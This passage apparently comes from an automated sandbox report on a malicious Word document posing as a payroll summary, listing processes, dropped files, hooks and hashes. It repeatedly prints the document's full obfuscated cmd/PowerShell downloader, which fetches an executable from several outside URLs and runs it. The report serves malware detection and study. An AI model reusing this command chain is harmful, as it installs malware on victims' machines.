9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))"), Spawned process "powershell.exe" with commandline "powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" (Show Process), Spawned process "57463.exe" (Show Process), Spawned process "cmnmspthrd.exe" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"57463.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~$172 Payroll Summary.doc" has type "data"
"09172 Payroll Summary.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu May 17 20:52:27 2018 mtime=Thu May 17 20:52:27 2018 atime=Thu May 17 20:52:42 2018 length=167424 window=hide"
"09172%20Payroll%20Summary.doc.lnk" has type "MS Windows shortcut Item id list present Points to a file or directory Has Description string Has Relative path Has command line arguments Archive ctime=Thu May 17 20:52:27 2018 mtime=Thu May 17 20:52:27 2018 atime=Thu May 17 20:52:42 2018 length=167424 window=hide"
"index.dat" has type "data"
"~WRD0000.tmp" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 6.1 Code page: 1252 Title: Ryfewujashowavae46504 Subject: Ryfewujasho58022 Author: Ryfewuja84323 Template: Normal Revision Number: 1 Name of Creating Application: Microsoft Office Word Create Time/Date: Thu May 17 19:45:00 2018 Last Saved Time/Date: Thu May 17 19:45:00 2018 Number of Pages: 1 Number of Words: 0 Number of Characters: 5 Security: 0"
"~WRD0002.tmp" has type "Composite Document File V2 Document Cannot read section info"
"QR3RTP9CEYNQI3ODIF1G.temp" has type "data"
"~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp" has type "data"
"~WRD0003.tmp" has type "Composite Document File V2 Document Little Endian Os: Windows Version 6.1 Code page: 1252 Title: Ryfewujashowavae46504 Subject: Ryfewujasho58022 Template: Normal Revision Number: 1 Name of Creating Application: Microsoft Office Word Create Time/Date: Thu May 17 19:45:00 2018 Last Saved Time/Date: Thu May 17 23:07:00 2018 Number of Pages: 1 Number of Words: 1 Number of Characters: 7 Security: 0"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\w32x86\3\sendtoonenote.BUD"
"WINWORD.EXE" touched file "C:\Windows\System32\spool\drivers\w32x86\3\sendtoonenote.gpd" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9U"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Heuristic match: "ifcingenieria.cl" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "cd596467" to virtual address "0x6ADECA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "3d086b67" to virtual address "0x68AB0BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "028b6367" to virtual address "0x6B16F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "6e317d67" to virtual address "0x63B110AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e936551af1" to virtual address "0x776F3EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "59436467" to virtual address "0x69AB78E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "c4ca937780bb9377aa6e94779fbb937708bb937746ce937761389477de2f9477d0d9937700000000177958764f9158767f6f5876f4f7587611f75876f2835876857e587600000000" to virtual address "0x70691000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "e99e48f1f0" to virtual address "0x77943D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "816d7f67" to virtual address "0x63A09904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baac461f0068dcf5de62c3" to virtual address "0x0020F05C"
"WINWORD.EXE" wrote bytes "ba80502700b98b7bde62ffe1" to virtual address "0x0021173A"
"WINWORD.EXE" wrote bytes "2ef1aa67" to virtual address "0x2FE21B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baec461f0068dcf5de62c3" to virtual address "0x0020F07C"
"WINWORD.EXE" wrote bytes "e923991cf1" to virtual address "0x776F5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e960331af1" to virtual address "0x776F4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "bad02e6805b98b7bde62ffe1" to virtual address "0x002105BE"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baac471f0068dcf5de62c3" to virtual address "0x0020F0DC"
"WINWORD.EXE" wrote bytes "babcb67005b98b7bde62ffe1" to virtual address "0x00210C36"
"WINWORD.EXE" wrote bytes "ba04ac6905b98b7bde62ffe1" to virtual address "0x00211712"
"WINWORD.EXE" wrote bytes "b800000000663d33c0baec471f0068dcf5de62c3" to virtual address "0x0020F0FC" - source
- Hook Detection
- relevance
- 10/10
-
Installs hooks/patches the running process
File Details
09172 Payroll Summary.doc
- Filename
- 09172 Payroll Summary.doc
- Size
- 164KiB (167424 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Author: Ryfewuja84323, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 08:45:00 2018, Last Saved Time/Date: Thu May 17 08:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
- Architecture
- WINDOWS
- SHA256
- 1533b6f547784d1f220e52dc4509ea45e55ccf3de5a1ea1849ebad89de1c5495
- MD5
- 2a1e6f619f0c407cb8b15b67f869df26
- SHA1
- 51fa8d9e54104ae33fda32aabe2cead6c36f9587
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 5 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\09172 Payroll Summary.doc"
(PID: 2508)
-
cmd.exe
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 4016, Additional Context: Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124)))
-
powershell.exe
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 